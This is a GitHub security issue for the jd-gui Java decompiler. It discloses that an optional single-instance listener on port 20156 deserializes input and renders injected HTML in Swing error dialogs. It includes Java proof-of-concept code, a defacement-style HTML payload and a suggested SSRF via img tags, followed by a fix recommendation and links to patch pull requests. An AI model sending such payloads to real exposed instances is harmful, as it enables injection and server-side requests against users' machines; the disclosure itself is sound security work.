search

java-decompiler / jd-gui

A standalone Java Decompiler GUI
GNU General Public License v3.0
13.97k stars 2.38k forks source link

[Security] Deserialize to Swing XSS #416

Closed Y4tacker closed 1 year ago

Y4tacker commented 1 year ago

Vulnerability Analysis

when somebody set UIMainWindowPreferencesProvider.singleInstance to true in jd-gui.cfg ,the InterProcessCommunicationUtil class will be called,

image

let's check it,it opens a listener on fixed port 20156 (If the IP is exposed to the public network or is accessible between intranets, it may be affected when using jd-gui)to deserialize the incoming data and the deserialized data is then passed to the function org.jd.gui.controller.MainController#openFiles for processing

image

in org.jd.gui.controller.MainController#openFiles, if erros is not empty, it will calls JOptionPane.showMessageDialog

image

we knowthe jdgui tool is built with swing components,so if we can control the data we can insert some html code let's test it

String[] strings = {"no file<html>123</html>"};

ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(strings);
oos.close();

try {
    Socket socket =new Socket("127.0.0.1",20156);

    BufferedOutputStream bufferedOutputStream = new BufferedOutputStream(socket.getOutputStream());
    bufferedOutputStream.write(barr.toByteArray());
    bufferedOutputStream.flush();

}catch (IOException e) {

    e.printStackTrace();

}

in this case,we found that the inserted html code was not rendered

image

After reading the code, we found that we need the html tags to be at the top of each line to work,so we can try to insert a line break

String[] strings = {"/\n\n\n\n<html><body><h1 color='red'>Hacked By Y4tacker</h1></body></html>"}; then,html tags are successfully rendered

image

So since we can render any html tag, it stands to reason that we can work with the src attribute of the img tag to achieve ssrf

Recommendations

in org.jd.gui.controller.MainController#openFiles

image

The return value of file.getAbsolutePath() is made harmless by removing the newline(\n) character or removing html tags from the return value

4ra1n commented 1 year ago

https://github.com/java-decompiler/jd-gui/pull/417

4ra1n commented 1 year ago

https://github.com/java-decompiler/jd-gui/pull/418